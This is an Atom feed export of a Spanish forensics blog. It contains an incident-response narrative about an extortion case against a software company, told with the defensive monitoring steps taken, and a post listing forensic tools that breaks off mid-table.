<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-6583475030409211074</id><updated>2012-01-30T13:50:35.094+01:00</updated><category term='Legal'/><category term='Libros'/><category term='Islam'/><category term='Forensics Mac'/><category term='Normativa'/><category term='Ciberterrorismo'/><category term='Herramientas'/><category term='Juicios'/><category term='Ingenieria social'/><category term='guias'/><category term='rfc'/><category term='Lectura interesante'/><category term='Forensics'/><category term='Utilidades'/><category term='Extorsión'/><category term='memoria'/><category term='RAM'/><category term='forense'/><category term='OSX'/><category term='Curiosidades'/><category term='Análisis'/><category term='iphone'/><category term='android'/><category term='Forensic'/><category term='ponencias'/><category term='Cursos'/><category term='movil'/><category term='varios'/><category term='Noticias'/><category term='normas'/><category term='Mac'/><category term='eventos'/><category term='Hardware'/><category term='extorsion'/><category term='anecdotas'/><category term='analisis'/><category term='Amigos'/><category term='motorola'/><title type='text'>ConexionInversa</title><subtitle type='html'>Computer Forensics &amp;amp; Security</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default?start-index=101&amp;max-results=100'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>150</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-2003050113912669932</id><published>2012-01-07T12:16:00.000+01:00</published><updated>2012-01-08T11:01:46.147+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Forensics'/><category scheme='http://www.blogger.com/atom/ns#' term='Juicios'/><category scheme='http://www.blogger.com/atom/ns#' term='forense'/><category scheme='http://www.blogger.com/atom/ns#' term='Forensic'/><category scheme='http://www.blogger.com/atom/ns#' term='extorsion'/><category scheme='http://www.blogger.com/atom/ns#' term='Extorsión'/><title type='text'>Pávlov el zombie - Un caso de extorsión (I)</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-MWVqSJbyP20/TwiJbktBADI/AAAAAAAAChI/07VhaMMPrKs/s1600/Captura+de+pantalla+2012-01-07+a+la%2528s%2529+19.05.02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="157" src="http://4.bp.blogspot.com/-MWVqSJbyP20/TwiJbktBADI/AAAAAAAAChI/07VhaMMPrKs/s200/Captura+de+pantalla+2012-01-07+a+la%2528s%2529+19.05.02.png" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;Hola lectores,&lt;br /&gt;&lt;br /&gt;Arturo y Eli son socios y&amp;nbsp;jóvenes&amp;nbsp;emprendedores dedicados en cuerpo y alma a un proyecto que idearon en la universidad hace cinco años. Se dedican en exclusiva a desarrollar aplicaciones en modo SaaS para empresas en el ámbito de medio ambiente y desde que comenzó el proyecto hoy cuentan con setenta empleados que no es poco en la crisis que vivimos.&lt;br /&gt;&lt;br /&gt;El único problema digno de mención surgió hace dos años con un empleado que resaltaba por su brillantez a la hora de programar. Tenia un hueco y futuro en la empresa pero dado su carácter y forma de ser no acepto tener una mujer como responsable de equipo. Con el tiempo las relaciones entre los componentes fueron a peor y Arturo y Eli&amp;nbsp;decidieron&amp;nbsp;tras una gran discusión con este que debería de irse aún perdiendo un estupendo programador. La cosa se hizo de mutuo acuerdo y se&amp;nbsp;despidió.&lt;br /&gt;&lt;br /&gt;El tiempo pasa y la vida continua y esta&amp;nbsp;magnífica&amp;nbsp;empresa empieza a dar muy buenos resultados abriendo delegación en Brasil. Arturo y Eli mientras tanto son premiados por la Cámara de Comercio por su buena trayectoria. Deciros que hoy en día esta empresa tiene novios con objeto de ser comprada.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;UN ZOMBI EN MI BUZON DE CORREO&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;El pasado mes de Noviembre Eli recibe un correo con una mala traducción al Español indicando que debe de pagar 90.000€ a una mafia ubicada en Rusia. En caso contrario "Pávlov el Zombie" que es como se hace llamar, le comunica que tras el plazo de siete días procederá a apagar los servidores de la empresa.&lt;br /&gt;&lt;br /&gt;Por su puesto Eli, ve en el correo una broma y decide olvidar el asunto hasta que efectivamente al séptimo día y como bien dice ella "se forjo la maldición" y uno de los servidores de Active Directory se apago ordenadamente en plena ebullición de trabajo a las 12:00h.&lt;br /&gt;&lt;br /&gt;En estos casos ya sabéis lo que ocurre. El responsable de sistemas empezó a recibir alertas, llamadas de sus compañeros y llamadas desde Brasil. Arturo que es alertado por el móvil no le da importancia y Eli la mínima (estas cosas pasan en todos los días en las empresas, pensó).&lt;br /&gt;&lt;br /&gt;Pero la sorpresa fue mayúscula, cuando el administrador &amp;nbsp;inicio sesión en el servidor y apareció el escritorio, se encontró con una fotografía de Eli con su familia de fondo de pantalla. Algo raro está pasando.&lt;br /&gt;&lt;br /&gt;Esa misma mañana deciden reunirse y ver lo ocurrido Eli comenta que fue advertida por un tal "Pávlov" llegando a la conclusión de lo que pensó que era una mal broma la cosa empezaba a convertirse en cruda realidad.&amp;nbsp;Paralelamente en la tarde del suceso Eli recibe más correos de 'Pávlov el Zombie' reclamando el dinero.&lt;br /&gt;&lt;br /&gt;Para no hacer muy extenso el post os diré que hasta ahora esto es lo que&amp;nbsp;ocurrió&amp;nbsp;en la empresa y que esto ocurre en Septiembre y que por 'motu' propio de la empresa y tras hablar con sus abogados deciden realizar las siguientes acciones hasta primeros de noviembre:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Poner una denuncia.&amp;nbsp;La operativa por parte de las fuerzas de seguridad y tras orden judicial se solicita a Google que de información de esa cuenta de correo. Esto además de ser un proceso arduo y duro viene a costar entres uno y tres meses dependiendo del tipo de maldad o fraude cometido.&lt;/li&gt;&lt;li&gt;Analizar las cabeceras de los correos recibidos (que por cierto son de Gmail)&lt;/li&gt;&lt;li&gt;Revisar el servidor y puestos de trabajo en busca de troyanos&lt;/li&gt;&lt;li&gt;Cambiar las contraseñas de todos los dispositivos, servidor y puestos de trabajo&lt;/li&gt;&lt;/ul&gt;Pero lo peor estaba por venir &amp;nbsp;en Noviembre "Pávlov" alias "El zombie" reaparece y anunciaba que si no recibía el pago en cinco días antes de las 12:00h del Viernes, procedería a borrar información aleatoriamente del servidor.&lt;br /&gt;&lt;br /&gt;Lo que antes fue una advertencia ahora se convertía en un reto dado que se supone que el control lo tiene la empresa.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;ESTORNUDAR ES SIMBOLO DE INFECCION ZOMBIE&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Bueno, pues lo dicho aquí es donde entramos a colaborar y allí estamos desde el&amp;nbsp;Miércoles. El escenario que nos encontramos es el siguiente:&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Cortafuegos Juniper en alta disponibilidad con balanceador de carga y dos servidores Windows 2008 con Active Directory, IIS publicando varias aplicaciones que se gestionan desde ayuntamientos y otras empresas por medio de una VPN. SQL Server 2008 como base de datos y replicadas en Barcelona en sendos servidores Windows Server 2008.&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Una sospecha por parte de Eli y Arturo, del antiguo empleado que se marcho de la empresa de forma 'poco ejemplar'&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;y tres días solo para la hora 'H'&lt;/li&gt;&lt;/ul&gt;&lt;span style="color: #b45f06;"&gt;MIERCOLES&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Con objeto de monitorizar se realizó (a la puta carrera) lo siguiente (no recuerdo muy bien el orden):&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Se puso el Switch en modo 'port mirroring' en dos 'bocas'. En una de ellas se puso un detector de intrusos paralelamente con Wireshark a saco para capturar tráfico. En la otra se puso &lt;a href="http://www.netwitness.com/products-services/spectrum"&gt;Spectrum de NetWitness&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Se aplico una regla en los Juniper con un 'trigger' en log que vigilase todo el tráfico de entrada y salida de los dos servidores y del servidor de OpenVPN.&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Se aplico una regla en los cortafuegos de Windows que comprobase todo el tráfico de salida con objeto de comparar con los Juniper&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Se aplico la última actualización de los servidores (solo había una crítica del navegador)&amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Se desinstalo el antivirus actual y se instalo otro más agresivo y que fuera diferente a los de la red corporativa. Es posible que 'Pávlov' pudiera saltarse la detección del &amp;nbsp;antivirus si había realizado un malware 'a medida' y mas si sospechamos del antiguo empleado.&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Se hizo pasar la navegación de los servidores por un proxy con autenticación. De esta forma si el atacante utiliza un malware de upsss 'conexión inversa' con algún puerto no&amp;nbsp;estándar&amp;nbsp;quedaría registrado en el proxy y no tendría efecto.&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Se deshabilito el servicio de terminal server (empleado solo por los administradores) y se instalo Wireshark en los servidores (si , ya se que fue un poco bruto). Esto se debe a que si el malware utiliza algún tipo de cifrado, nos sería mas sencillo de ver en la capa de red y usuario que es lo que envía y recibe. Por ultimo instalamos varias utilidades para monitorizar los procesos (decidimos no utilizar los propios del sistema operativo por si este estuviera comprometido) entre ellos &lt;a href="http://www.knas.se/Applications/Restarter.aspx"&gt;Restarter&lt;/a&gt;&amp;nbsp;y&amp;nbsp;&lt;a href="http://www.knas.se/Applications/Loglady/ScreenShots.aspx"&gt;LogLady&lt;/a&gt;. También instalamos un syslog para que nos mandara los eventos de Windows a un pc de la instalación.&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Con el monitor de actividad de SQL Server se comprobó el uso y funcionamiento.&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Un compañero se dedico 'a saco' a revisar posibles vulnerabilidades en los aplicativos web&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li&gt;Tras diversas discusiones y aun sabiendo que no resultaría muy efectivo se virtualizo en VMware los servidores y sin seguir las recomendaciones de Microsoft (&lt;a href="http://technet.microsoft.com/es-es/library/dd348476(WS.10).aspx"&gt;ver&lt;/a&gt;)&amp;nbsp;(cosas del modo paranoico)&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;Y así pasamos un bonito Miércoles...&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #b45f06;"&gt;JUEVES&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Vuelta a revisar todo de arriba abajo y de abajo arriba, reuniones y modo paranoico en 'ON'.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #b45f06;"&gt;VIERNES 8:10h&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Me llama Arturo y Eli casi simultáneamente indicando que han vuelto ha recibir un email avisando de que se va a proceder al borrado de datos a la hora indicada. Se informa y adjunta el email a la denuncia que se realizó a las fuerzas de seguridad. Vuelta a re-e-e-e actualizar el antivirus y revisar las actualizaciones de Windows&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #b45f06;"&gt;10:00h&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Vuelta a revisar todo. Se estudia la posibilidad de avisar a los clientes, se diseña un protocolo y correo que nunca se llega a enviar. Volvemos a cambiar las contraseñas. La locura se hace evidente. &amp;nbsp;La dirección de la empresa piensa en apagar los sistemas para que no se produzca el borrado. Es decir hacer un 'haraquiri' o auto-denegación de servicio. Cosa por mi parte inadmisible dado que mueves el problema a otra fecha y no lo resuelves, además de perder datos de investigación muy relevantes. Vuelta hacer Backups por si acaso.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #b45f06;"&gt;11:00h&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Todo el mundo atento. Todo el mundo firmes y en posición de batalla, sensores, Log's y nuestra atención al filtrado de los cortafuegos, proxy's e IDS's&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #b45f06;"&gt;11:28h&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Silencio total. Todos mirando el monitor. El 'acojone' y los apretones de tripa 'se huelen'&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #b45f06;"&gt;12:00h&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Silencio. Todo funciona con normalidad. No se oye nada de vez en cuando un teléfono. La tecla F5 (actualizar) va 'a toda hostia'&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #b45f06;"&gt;12:05h&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Revisión de log's, revisión de controles y vuelta a monitorizar&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #b45f06;"&gt;12:30h&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Caras de alegría. El tipo no puede entrar. No tiene control. Todo va normal&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #b45f06;"&gt;13:00h&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Alegría tensa. Primera reunión después de DEFCON 1. Pensamos que todo ha sido una 'mala pasada' y que si antes tenia el control ahora es evidente que no lo tiene. Pasamos a DEFCON 2. (Perdón por la jerga militar). Esperamos hasta la hora de comer ya hacemos hasta bromas pero no dejamos de mirar las pantallas&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #b45f06;"&gt;14:30h.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Eli y Arturo nos hacen pedir para todos unas Pizzas y coca colas. Hoy todos comemos en la sala de reuniones. La invitación a una comilona se hace palpable, pero hoy no y como dijo José Mota: mañaaaaaaaana. (NOTA: La comida se produjo pero no tan pronto como nos hubiera gustado)&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #b45f06;"&gt;16:00h.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Todos nos relajamos, el Tsunami no llego a serlo. Mas y mas bromas, somos los mejores&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #b45f06;"&gt;16:22h&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;LOS ZOMBIES NO DISCRIMINAN, TE COMEN SI VAS LENTO&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;El administrador de dominio en una copia de datos rutinaria le da error la carpeta de origen. Comprueba alertado que los datos no están. Han desaparecido delante de nuestra cara y estupefacto me quedo al comprobarlo.&lt;br /&gt;&lt;br /&gt;También faltan las carpetas de "Archivos de Programa" aunque algunos ficheros no se han borrado debido a que están en uso. Entre los desaparecidos están los ficheros raíz y muchos archivos de la carpeta Windows. Aquí el único que se ha enterado es el visor de eventos de Windows que nos ha enviado el evento a una máquina remota.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;FAIL!!!&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;¿Pero que cojones ha ocurrido?, ¿Como es posible?.&lt;br /&gt;&lt;br /&gt;Ninguna alerta, ninguna alarma, el IDS's ni se entera. Los logs's de lo Juniper a cero bytes, ningún proceso ha sido creado, nadie ha tocado nada, las conexiones de red las normales con acceso y peticiones http y https. Ningún tráfico de salida desde los dos servidores y aún así este tipo ha conseguido acceso y borrado datos tal y como predijo.&lt;br /&gt;&lt;br /&gt;Las preguntas vuelan y la perplejidad de Eli y Arturo que con la mirada lo dicen todo, hacen ver que la derrota es muy amarga.&amp;nbsp;Aunque los datos se han podido recuperar y realmente ha sido lo de menos, &amp;nbsp;lo que verdaderamente mas me ha dolido en mi orgullo es que he perdido la apuesta (moral) con esta empresa con un 0-2 para 'Pávlov'. La verdad es que me senti derrotado.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Las dudas y mareos&amp;nbsp;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;¿Me estaré enfrentando realmente a un hacker contratado por la mafia?, ¿Se me ha pasado por alto algún control?, ¿dispone 'Pávlov el zombie' de algún 0Day? o he subestimado el potencial de un ex-empleado...&lt;br /&gt;&lt;br /&gt;Es momento de volcar la memoria de los servidores, analizar lo poco que tenemos,volver a recapacitar y revisar con mas profundidad los controles. Cuando se toca fondo solo hay un camino y es tirar hacia arriba.&lt;br /&gt;&lt;br /&gt;************&lt;br /&gt;&lt;br /&gt;Bueno el resultado técnico final y con pantallas lo tendréis para la semana que viene... no os lo perdáis por que la cosa va por SQL SERVER y no es un ataque web, ni de SQL-Injection ni por asomo un 0day, ni malware que se le parezca. También es la historia de un empeño por descubrir que ha pasado&lt;br /&gt;&lt;br /&gt;¿Que será?...&lt;br /&gt;&lt;br /&gt;En este mundo de Zombies veremos quien caza a quien...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-2003050113912669932?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/2003050113912669932/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=2003050113912669932' title='29 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/2003050113912669932'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/2003050113912669932'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2012/01/pavlov-el-zombie-un-caso-de-extorsion-i.html' title='Pávlov el zombie - Un caso de extorsión (I)'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/-MWVqSJbyP20/TwiJbktBADI/AAAAAAAAChI/07VhaMMPrKs/s72-c/Captura+de+pantalla+2012-01-07+a+la%2528s%2529+19.05.02.png' height='72' width='72'/><thr:total>29</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-1848810268477396452</id><published>2011-11-15T17:58:00.001+01:00</published><updated>2011-11-18T14:27:27.034+01:00</updated><title type='text'>101 utilidades forenses</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-i7_EwfZlEsc/TsZcUSl7UHI/AAAAAAAACgw/zjxG_4eU7To/s1600/caja-de-herramientas_17-117063456.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://1.bp.blogspot.com/-i7_EwfZlEsc/TsZcUSl7UHI/AAAAAAAACgw/zjxG_4eU7To/s200/caja-de-herramientas_17-117063456.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Hola lectores,&lt;br /&gt;&lt;br /&gt;Estuve revisando el software y hardware que suelo llevarme cuando tengo un caso o intervención en un cliente y he creído&amp;nbsp;conveniente compartir las utilidades que mas suelo emplear o que alguna vez he necesitado. También de paso contesto a los correos en los que me&amp;nbsp;preguntáis&amp;nbsp;por una u otra herramienta.&lt;br /&gt;&lt;br /&gt;Quiero decir que este recopilatorio es personal y se basa en aquellas utilidades que suelo emplear o como ya he dicho he precisado alguna vez. Algunas son comerciales y en su mayoría 'Open'. He puesto 101, pero seguro que me dejo alguna.&lt;br /&gt;&lt;br /&gt;Estan ordenadas alfabeticamente pero no las he categorizado dado que muchas hacen lo mismo y valen tanto para analizar ordenadores como dispositivos móviles, buscar malware o encontrar evidencias.&lt;br /&gt;&lt;br /&gt;Espero que os sean de utilidad.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;101 UTILIDADES&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;table border="0" cellpadding="0" cellspacing="0" class="tblGenFixed" id="tblMain"&gt;&lt;tbody&gt;&lt;tr class="rShim"&gt;&lt;td class="rShim" style="width: 0;"&gt;&lt;/td&gt;&lt;td class="rShim" style="width: 116px;"&gt;&lt;/td&gt;&lt;td class="rShim" style="width: 128px;"&gt;&lt;/td&gt;&lt;td class="rShim" style="width: 337px;"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s0"&gt;&lt;a href="http://www.ash368.com/" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Advanced&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.ash368.com/" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Prefetch Analyser&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s1"&gt;Hallan Hay&lt;/td&gt;&lt;td class="s1"&gt;Lee los ficheros prefetch de Windows. Simplemente genial&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 15px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;a href="http://www.mythicsoft.com/page.aspx?type=agentransack&amp;amp;page=home" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Agent Ransack&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;Mythicsoft&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;Busca multiples ficheros usando Perl Regex. Lo he utilizado alguna vez con resultados muy efectivos.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 45px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 45px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;a href="http://code.google.com/p/opensourceforensics/wiki/analyzeMFT?ts=1309609723&amp;amp;updated=analyzeMFT" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;analyzeMFT&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;div style="text-align: left;"&gt;David&lt;/div&gt;&lt;div style="text-align: left;"&gt;Kovar&lt;/div&gt;&lt;/td&gt;&lt;td class="s3"&gt;Permite realizar 'Parses' de MFT en sistemas NTFS con objeto de analizarlos con otras herramientas. Lo he utilizado en combinación con EnCase.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 19px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;a href="http://www.mandiant.com/products/free_software/mandiant_audit_viewer/" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Audit Viewer&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;div style="text-align: left;"&gt;Mandiant&lt;/div&gt;&lt;/td&gt;&lt;td class="s3"&gt;Visualizador utilizado en combinación con Memoryze.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 19px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 45px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;a href="http://www.sleuthkit.org/autopsy/" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Autopsy&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;div style="text-align: left;"&gt;Brian Carrier&lt;/div&gt;&lt;/td&gt;&lt;td class="s3"&gt;Reconocida herramienta gráfica para entornos Linux con muy buen sabor y experiencia en entornos forense. Es otro clásico a utilizar.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 45px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;a href="http://www.backtrack-linux.org/" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Backtrack&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;div style="text-align: left;"&gt;Backtrack&lt;/div&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;Suite de 'Penetration testing' y seguridad para la realización de auditorias de seguridad. Muy muy bueno.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 16px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.bitpim.org/"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Bitpim&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s4"&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;Bitpim&lt;/div&gt;&lt;/td&gt;&lt;td class="s5"&gt;&lt;br /&gt;&lt;br /&gt;Analiza dispositivos móviles como LG, Sanyo, etc.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;a href="http://www.caine-live.net/" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;Caine&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;University of Modena e Reggio Emilia&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;Live CD, con numerosas utilidades y herramientas.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 16px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;td class="s5"&gt;&lt;br /&gt;&lt;br /&gt;Analiza tarjetas SIM, direcciones, llamadas, etc.&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 30px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;a href="http://forensic-software.co.uk/default.aspx" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;ChromeAnalysis&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;forensic-software&lt;/td&gt;&lt;td class="s3"&gt;Herramienta que permite el análisis del historico de internet del famoso Google Chrome&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="hd"&gt;&lt;div style="height: 45px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class="s2"&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.nirsoft.net/utils/chrome_cache_view.html" target="_blank"&gt;&lt;span class="Apple-style-span" style="color: #0b5394;"&gt;ChromeCacheView&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="s3"&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: 